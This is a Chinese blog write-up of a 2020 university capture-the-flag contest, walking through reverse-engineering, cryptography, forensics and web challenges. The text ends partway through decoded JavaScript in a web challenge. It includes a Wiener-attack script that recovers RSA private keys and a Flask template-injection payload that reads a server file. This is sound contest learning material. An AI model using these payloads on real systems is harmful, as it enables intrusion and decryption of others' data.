<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Cumt2020十月校赛 by 水一水, Meteo&#39;s blog">
    <meta name="description" content="Stay hungry，Stay foolish">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Cumt2020十月校赛 by 水一水 | Meteo&#39;s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 4.1.1"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Meteo&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Meteo&#39;s blog</div>
        <div class="logo-desc">
            
            Stay hungry，Stay foolish
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/17.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Cumt2020十月校赛 by 水一水</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/CTF/">
                                <span class="chip bg-color">CTF</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/cumtCTF/" class="post-category">
                                cumtCTF
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2020-10-23
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2020-10-24
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    2.1k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    10 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="hello-word"><a href="#hello-word" class="headerlink" title="hello word"></a>hello word</h3><p>拖到IDA中查看，打开sub_40156F函数<br><img src="https://img-blog.csdnimg.cn/20201023180537795.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODMxODE4,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>对此代码分析，a1为输入的字符串，查看byte_403020和aIsEasyRight。<br><img src="https://img-blog.csdnimg.cn/20201023180915931.png#pic_center" alt="在这里插入图片描述"><br>写一个python脚本推出a1。<br><img src="https://img-blog.csdnimg.cn/20201023181001159.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODMxODE4,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>得到Flag</p>
<h3 id="non-name"><a href="#non-name" class="headerlink" title="non_name"></a>non_name</h3><h4 id="1、拖进IDA分析代码"><a href="#1、拖进IDA分析代码" class="headerlink" title="1、拖进IDA分析代码"></a>1、拖进IDA分析代码</h4><p><img src="https://i.loli.net/2020/10/23/Cw5PTf6o2g9uRI7.png" alt="image-20201023130444214"></p>
<p>可以看见调用了函数 sub_401530后，就出现了flag的字符串，由此猜测这是个关键函数。</p>
<h4 id="2、双击进入该函数："><a href="#2、双击进入该函数：" class="headerlink" title="2、双击进入该函数："></a>2、双击进入该函数：</h4><p><img src="https://i.loli.net/2020/10/23/g3pPe45S6HbdzYD.png" alt="image-20201023130904749"></p>
<p>dword_407044是用于存储用户输入的东西，dword_403010、dword_40703E是已知的数组。</p>
<p>分别查看各个地址存的东西：</p>
<p><img src="https://i.loli.net/2020/10/23/IZeDHSJLbEMKgCf.png" alt="image-20201023131427224"></p>
<p><img src="https://i.loli.net/2020/10/23/WCDwmHkQe3qIvK6.png" alt="image-20201023131404760"></p>
<h4 id="3、分析循环"><a href="#3、分析循环" class="headerlink" title="3、分析循环"></a>3、分析循环</h4><p>结合循环可知应该是个四元一次方程组，dword_403010中存的是方程系数，dword_40703E中存的是常数项。于是百度找<a href="http://www.99cankao.com/algebra/unknwn4.php" target="_blank" rel="noopener">四元一次方程组计算器</a>，计算可得解</p>
<p><img src="https://i.loli.net/2020/10/23/tB8T2Oh6s4rPgqp.png" alt="image-20201023131901437"></p>
<p>再转成16进制套上cumtctf{}提交即可。</p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="Classical"><a href="#Classical" class="headerlink" title="Classical"></a>Classical</h3><h4 id="1、合理猜测是古典密码"><a href="#1、合理猜测是古典密码" class="headerlink" title="1、合理猜测是古典密码"></a>1、合理猜测是古典密码</h4><p>拿到题目文件，打开是一长串字符，结合题目名字猜测是古典密码。而古典密码就三种，尝试过后，猜测是vigenere密码。</p>
<h4 id="2、用工具进行解密"><a href="#2、用工具进行解密" class="headerlink" title="2、用工具进行解密"></a>2、用工具进行解密</h4><p>由于不知道密钥，所以选择<a href="https://www.guballa.de/vigenere-solver" target="_blank" rel="noopener">vigenere爆破</a>，得到：</p>
<p>There are moments in life when you miss someone so much that you just want to pick them from your dreams and hug them for real! Dream what you want to dream;go where you want to go;be what you want to be,because you have only one life and one chance to do all the things you want to do.May you have enough happiness to make you sweet,enough trials to make you strong,enough sorrow to keep you human,enough hope to make you happy? Always put yourself in others’shoes.If you feel that it hurts you,it probably hurts the other person, too.The happiest of people don’t necessarily have the best of everything;they just make the most of everything that comes along their way.Happiness lies for those who cry,those who hurt, those who have searched,and those who have tried,for only they can appreciate the importance of people.who have touched their lives.Love begins with a smile,grows with a kiss and ends with a tear.The brightest future will always be based on a forgotten past, you can’t go on well in lifeuntil you let go of your past failures and heartaches.And in the end, I am glad to tell you the CUMTCTF is EnjoyTheVigenereCipher.By the way, remember to use braces before submitting.</p>
<p>这样一段文字，阅读后得到flag为CUMTCTF{EnjoyTheVigenereCipher}。</p>
<h3 id="ezRSA"><a href="#ezRSA" class="headerlink" title="ezRSA"></a>ezRSA</h3><p>网上无法对题目给出的n进行分解，百度找到脚本直接分解可得：</p>
<p><img src="https://i.loli.net/2020/10/23/dobRjkgeZxM8Ua3.png" alt="image-20201023133157594"></p>
<pre class=" language-python"><code class="language-python">
<span class="token triple-quoted-string string">'''
Created on Dec 14, 2011

@author: pablocelayes
'''</span>

<span class="token keyword">import</span> ContinuedFractions<span class="token punctuation">,</span> Arithmetic<span class="token punctuation">,</span> RSAvulnerableKeyGenerator
<span class="token keyword">import</span> binascii
<span class="token keyword">import</span> codecs

<span class="token keyword">def</span> <span class="token function">hack_RSA</span><span class="token punctuation">(</span>e<span class="token punctuation">,</span>n<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token triple-quoted-string string">'''
    Finds d knowing (e,n)
    applying the Wiener continued fraction attack
    '''</span>
    frac <span class="token operator">=</span> ContinuedFractions<span class="token punctuation">.</span>rational_to_contfrac<span class="token punctuation">(</span>e<span class="token punctuation">,</span> n<span class="token punctuation">)</span>
    convergents <span class="token operator">=</span> ContinuedFractions<span class="token punctuation">.</span>convergents_from_contfrac<span class="token punctuation">(</span>frac<span class="token punctuation">)</span>

    <span class="token keyword">for</span> <span class="token punctuation">(</span>k<span class="token punctuation">,</span>d<span class="token punctuation">)</span> <span class="token keyword">in</span> convergents<span class="token punctuation">:</span>

        <span class="token comment" spellcheck="true">#check if d is actually the key</span>
        <span class="token keyword">if</span> k<span class="token operator">!=</span><span class="token number">0</span> <span class="token operator">and</span> <span class="token punctuation">(</span>e<span class="token operator">*</span>d<span class="token number">-1</span><span class="token punctuation">)</span><span class="token operator">%</span>k <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">:</span>
            phi <span class="token operator">=</span> <span class="token punctuation">(</span>e<span class="token operator">*</span>d<span class="token number">-1</span><span class="token punctuation">)</span><span class="token operator">//</span>k
            s <span class="token operator">=</span> n <span class="token operator">-</span> phi <span class="token operator">+</span> <span class="token number">1</span>
            <span class="token comment" spellcheck="true"># check if the equation x^2 - s*x + n = 0</span>
            <span class="token comment" spellcheck="true"># has integer roots</span>
            discr <span class="token operator">=</span> s<span class="token operator">*</span>s <span class="token operator">-</span> <span class="token number">4</span><span class="token operator">*</span>n
            <span class="token keyword">if</span><span class="token punctuation">(</span>discr<span class="token operator">>=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                t <span class="token operator">=</span> Arithmetic<span class="token punctuation">.</span>is_perfect_square<span class="token punctuation">(</span>discr<span class="token punctuation">)</span>
                <span class="token keyword">if</span> t<span class="token operator">!=</span><span class="token operator">-</span><span class="token number">1</span> <span class="token operator">and</span> <span class="token punctuation">(</span>s<span class="token operator">+</span>t<span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">2</span><span class="token operator">==</span><span class="token number">0</span><span class="token punctuation">:</span>
                    <span class="token comment" spellcheck="true"># print("Hacked!")</span>
                    <span class="token keyword">return</span> d

<span class="token comment" spellcheck="true"># TEST functions</span>

<span class="token keyword">def</span> <span class="token function">test_hack_RSA</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token comment" spellcheck="true"># print("Testing Wiener Attack")</span>
    times <span class="token operator">=</span> <span class="token number">5</span>

    <span class="token keyword">while</span><span class="token punctuation">(</span>times<span class="token operator">></span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
        e<span class="token punctuation">,</span>n<span class="token punctuation">,</span>d <span class="token operator">=</span> RSAvulnerableKeyGenerator<span class="token punctuation">.</span>generateKeys<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span>
        <span class="token comment" spellcheck="true"># print("(e,n) is (", e, ", ", n, ")")</span>
        <span class="token comment" spellcheck="true"># print("d = ", d)</span>

        hacked_d <span class="token operator">=</span> hack_RSA<span class="token punctuation">(</span>e<span class="token punctuation">,</span> n<span class="token punctuation">)</span>

        <span class="token keyword">if</span> d <span class="token operator">==</span> hacked_d<span class="token punctuation">:</span>
            <span class="token comment" spellcheck="true"># print("Hack WORKED!")</span>
            <span class="token keyword">pass</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token comment" spellcheck="true"># print("Hack FAILED")</span>
            <span class="token keyword">pass</span>

        <span class="token comment" spellcheck="true"># print("d = ", d, ", hacked_d = ", hacked_d)</span>
        <span class="token comment" spellcheck="true"># print("-------------------------")</span>
        times <span class="token operator">-=</span> <span class="token number">1</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    n <span class="token operator">=</span> <span class="token number">460657813884289609896372056585544172485318117026246263899744329237492701820627219556007788200590119136173895989001382151536006853823326382892363143604314518686388786002989248800814861248595075326277099645338694977097459168530898776007293695728101976069423971696524237755227187061418202849911479124793990722597</span>
    e <span class="token operator">=</span> <span class="token number">354611102441307572056572181827925899198345350228753730931089393275463916544456626894245415096107834465778409532373187125318554614722599301791528916212839368121066035541008808261534500586023652767712271625785204280964688004680328300124849680477105302519377370092578107827116821391826210972320377614967547827619</span>
    c <span class="token operator">=</span> <span class="token number">235079473042454099807116076488262740135383858230967099540307826273199444131724945298259060669497025680602868465015609167157760611830665379910856647739895018654389167886359502125262006498872925841789249028759026079722290718145036644959479543255350040619949567107916725017078853648984759794085772688267388901151</span>
    <span class="token comment" spellcheck="true">#test_is_perfect_square()</span>
    d <span class="token operator">=</span> <span class="token number">8264667972294275017293339772371783322168822149471976834221082393409363691895</span>
    m <span class="token operator">=</span> pow<span class="token punctuation">(</span>c<span class="token punctuation">,</span>d<span class="token punctuation">,</span>n<span class="token punctuation">)</span>
    <span class="token keyword">def</span> <span class="token function">num2str</span><span class="token punctuation">(</span>num<span class="token punctuation">)</span><span class="token punctuation">:</span>
        tmp <span class="token operator">=</span> hex<span class="token punctuation">(</span>num<span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">"L"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">)</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span>len<span class="token punctuation">(</span>tmp<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">%</span><span class="token number">2</span> <span class="token operator">==</span><span class="token number">0</span><span class="token punctuation">:</span>
            <span class="token keyword">return</span> codecs<span class="token punctuation">.</span>decode<span class="token punctuation">(</span>tmp<span class="token punctuation">,</span> encoding<span class="token operator">=</span><span class="token string">'hex'</span><span class="token punctuation">)</span>
        <span class="token keyword">else</span><span class="token punctuation">:</span>
            <span class="token keyword">return</span> codecs<span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">"0"</span><span class="token operator">+</span>tmp<span class="token punctuation">)</span><span class="token punctuation">,</span> encoding<span class="token operator">=</span><span class="token string">'hex'</span><span class="token punctuation">)</span>

    <span class="token comment" spellcheck="true"># print("-------------------------")</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>str<span class="token punctuation">(</span>num2str<span class="token punctuation">(</span>pow<span class="token punctuation">(</span>c<span class="token punctuation">,</span>hack_RSA<span class="token punctuation">(</span>e<span class="token punctuation">,</span>n<span class="token punctuation">)</span><span class="token punctuation">,</span>n<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">,</span> encoding<span class="token operator">=</span><span class="token string">'utf8'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

</code></pre>
<p>依次运行得到d，然后稍微改下代码运行得到flag。</p>
<p><img src="https://i.loli.net/2020/10/23/ukG48wc92xqzOlN.png" alt="image-20201023161558174"></p>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="出个伪web吧"><a href="#出个伪web吧" class="headerlink" title="出个伪web吧"></a>出个伪web吧</h3><h4 id="拿到文件后"><a href="#拿到文件后" class="headerlink" title="拿到文件后"></a>拿到文件后</h4><p><img src="https://i.loli.net/2020/10/23/FJ3vQEOW9iHIXqu.png" alt="image-20201023133655163"></p>
<p>看到这个文件最近修改过，依次跟入</p>
<p><img src="https://i.loli.net/2020/10/23/awRMeSz2cfNF9lX.png" alt="image-20201023160315989"></p>
<p><img src="https://i.loli.net/2020/10/23/2EX8ehFzRK3Zi1x.png" alt="image-20201023160535098"></p>
<p>发现flag。</p>
<h3 id="出个文档吧"><a href="#出个文档吧" class="headerlink" title="出个文档吧"></a>出个文档吧</h3><p>打开文档发现一个空白文字，猜测应该有隐藏的文本，显示隐藏编辑标记找到flag。</p>
<p><img src="https://i.loli.net/2020/10/23/t3MlciQK2HYzSsv.png" alt="image-20201023160836103"></p>
<h3 id="Sign-In"><a href="#Sign-In" class="headerlink" title="Sign In"></a>Sign In</h3><p>打开文件</p>
<p>base64解码，得到brainfuck编码<a href="https://tool.bugku.com/brainfuck/?wafcloud=1%E8%A7%A3%E7%A0%81%E5%8D%B3%E5%8F%AF" target="_blank" rel="noopener">https://tool.bugku.com/brainfuck/?wafcloud=1解码即可</a></p>
<h3 id="出个流量分析吧"><a href="#出个流量分析吧" class="headerlink" title="出个流量分析吧"></a>出个流量分析吧</h3><p>wires hark打开后，发现http请求很多</p>
<p>导出http对象，发现flag文件</p>
<p><img src="../../../../medias/img/image-20201023215408729.png" alt="image-20201023215408729"></p>
<p>导出后base64解码即可</p>
<h3 id="出个LSB吧"><a href="#出个LSB吧" class="headerlink" title="出个LSB吧"></a>出个LSB吧</h3><p>用Stegsolve打开，将所有lsb有效位调为0，发现png图片，导出为二维码，扫描即可</p>
<p><img src="../../../../medias/img/image-20201023220005029.png" alt="image-20201023220005029"></p>
<h3 id="出个内存取证吧"><a href="#出个内存取证吧" class="headerlink" title="出个内存取证吧"></a>出个内存取证吧</h3><p>volatility imageinfo -f memory.img</p>
<p><img src="../../../../medias/img/image-20201023220525993.png" alt="image-20201023220525993"></p>
<p>测试后第二个可以 Win2003SP1x86</p>
<blockquote>
<p>volatility -f memory.img –profile=Win2003SP1x86 filescan | grep flag</p>
</blockquote>
<p><img src="../../../../medias/img/image-20201023221121725.png" alt="image-20201023221121725"></p>
<p>导出文件</p>
<blockquote>
<p>volatility -f memory.img –profile=Win2003SP1x86 dumpfiles -Q 0x000000000484f900 -D ./</p>
</blockquote>
<p>得到二维码扫描</p>
<blockquote>
<p>jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=</p>
</blockquote>
<p>查看窗口</p>
<blockquote>
<p>volatility -f memory.img –profile=Win2003SP1x86 windows</p>
</blockquote>
<p><img src="../../../../medias/img/image-20201023221742203.png" alt="image-20201023221742203"></p>
<p>flag.png 是由 explorer.exe 进程里的 Windows 图片查看器打开的</p>
<p>dumpexplorer.exe 进程</p>
<blockquote>
<p>volatility -f memory.img –profile=Win2003SP1x86 memdump -p 1992 -D ./</p>
</blockquote>
<p>对导出的文件foremost分离</p>
<p>得到图片</p>
<p><img src="../../../../medias/img/image-20201023221924851.png" alt="image-20201023221924851"></p>
<p>所以之前得到的是aes 加密</p>
<blockquote>
<p>密文：jfXvUoypb8p3zvmPks8kJ5Kt0vmEw0xUZyRGOicraY4=</p>
<p>key: Th1s_1s_K3y00000</p>
<p>iv: 1234567890123456</p>
<p>在线解密<a href="http://tool.chacuo.net/cryptaes" target="_blank" rel="noopener">http://tool.chacuo.net/cryptaes</a></p>
</blockquote>
<h3 id="出个压缩包吧"><a href="#出个压缩包吧" class="headerlink" title="出个压缩包吧"></a>出个压缩包吧</h3><p>打开有个txt，内容是flag is not here</p>
<p>放到hxd</p>
<p><img src="../../../../medias/img/image-20201023222334922.png" alt="image-20201023222334922"></p>
<p>发现隐藏文件</p>
<p><img src="../../../../medias/img/image-20201023222542579.png" alt="image-20201023222542579"></p>
<p>将7A改为74即可分离出图片</p>
<p><img src="../../../../medias/img/image-20201023222627561.png" alt="image-20201023222627561"></p>
<p>将图片后缀改为gif，ps打开，分离出另一个图层，放进Stegsolve，看到另一半二维码</p>
<p>ps拼凑一起扫描即可</p>
<h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="babyflask"><a href="#babyflask" class="headerlink" title="babyflask"></a>babyflask</h3><p><img src="../../../../medias/img/image-20201023212812778.png" alt="image-20201023212812778"></p>
<p>ssti，过滤了中括号，用<code>__getitem__</code>绕过</p>
<p>payload</p>
<pre class=" language-php"><code class="language-php">http<span class="token punctuation">:</span><span class="token comment" spellcheck="true">//202.119.201.199:9001/%7B%7B''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag').read()%7D%7D</span></code></pre>
<h3 id="doge"><a href="#doge" class="headerlink" title="doge"></a>doge</h3><p>打开网页，查看源代码，发现一大堆颜表情，用aaencode解码，发现还有加密，再用Unicode解码，最终得到源代码</p>
<pre class=" language-php"><code class="language-php"> <span class="token keyword">var</span> isBegin <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span>

<span class="token keyword">function</span> <span class="token function">numRand</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> x <span class="token operator">=</span> <span class="token number">9999</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> y <span class="token operator">=</span> <span class="token number">1000</span><span class="token punctuation">;</span>
    <span class="token keyword">var</span> rand <span class="token operator">=</span> <span class="token function">parseInt</span><span class="token punctuation">(</span>Math<span class="token punctuation">.</span><span class="token function">random</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">*</span> <span class="token punctuation">(</span>x <span class="token operator">-</span> y <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token operator">+</span> y<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> rand<span class="token punctuation">;</span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function">isPrimeNum</span><span class="token punctuation">(</span>num<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">return</span> <span class="token operator">!</span><span class="token operator">/</span><span class="token operator">^</span><span class="token punctuation">.</span><span class="token operator">?</span>$<span class="token operator">|</span><span class="token operator">^</span><span class="token punctuation">(</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token operator">+</span><span class="token operator">?</span><span class="token punctuation">)</span>\<span class="token package">1</span><span class="token operator">+</span>$<span class="token operator">/</span><span class="token punctuation">.</span><span class="token function">test</span><span class="token punctuation">(</span><span class="token keyword">Array</span><span class="token punctuation">(</span>num <span class="token operator">+</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">join</span><span class="token punctuation">(</span><span class="token string">'1'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">}</span>

<span class="token keyword">function</span> <span class="token function">check</span><span class="token punctuation">(</span>num<span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">isPrimeNum</span><span class="token punctuation">(</span>num<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        $<span class="token punctuation">.</span><span class="token function">ajax</span><span class="token punctuation">(</span><span class="token punctuation">{</span>
            url<span class="token punctuation">:</span> <span class="token string">'check.php'</span><span class="token punctuation">,</span>
            type<span class="token punctuation">:</span> <span class="token string">'POST'</span><span class="token punctuation">,</span>
            data<span class="token punctuation">:</span> <span class="token string">'num='</span> <span class="token operator">+</span> num<span class="token punctuation">,</span>
            success<span class="token punctuation">:</span> <span class="token keyword">function</span> <span class="token punctuation">(</span>data<span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token function">alert</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
        <span class="token punctuation">}</span><span class="token punctuation">)</span>
    <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
        <span class="token function">alert</span><span class="token punctuation">(</span> <span class="token string">'It seems t'</span>
        <span class="token operator">+</span><span class="token string">'hat you are'</span>
        <span class="token operator">+</span><span class="token string">' not lucky '</span>
        <span class="token operator">+</span><span class="token string">'enough, ple'</span>
        <span class="token operator">+</span><span class="token string">'ase keep tr'</span>
        <span class="token operator">+</span><span class="token string">'ying.'</span><span class="token punctuation">)</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
$<span class="token punctuation">(</span><span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">var</span> u <span class="token operator">=</span> <span class="token number">265</span><span class="token punctuation">;</span>
    $<span class="token punctuation">(</span><span class="token string">'.btn'</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">click</span><span class="token punctuation">(</span><span class="token keyword">function</span> <span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span>isBegin<span class="token punctuation">)</span> <span class="token keyword">return</span> <span class="token boolean">false</span><span class="token punctuation">;</span>
        isBegin <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span>
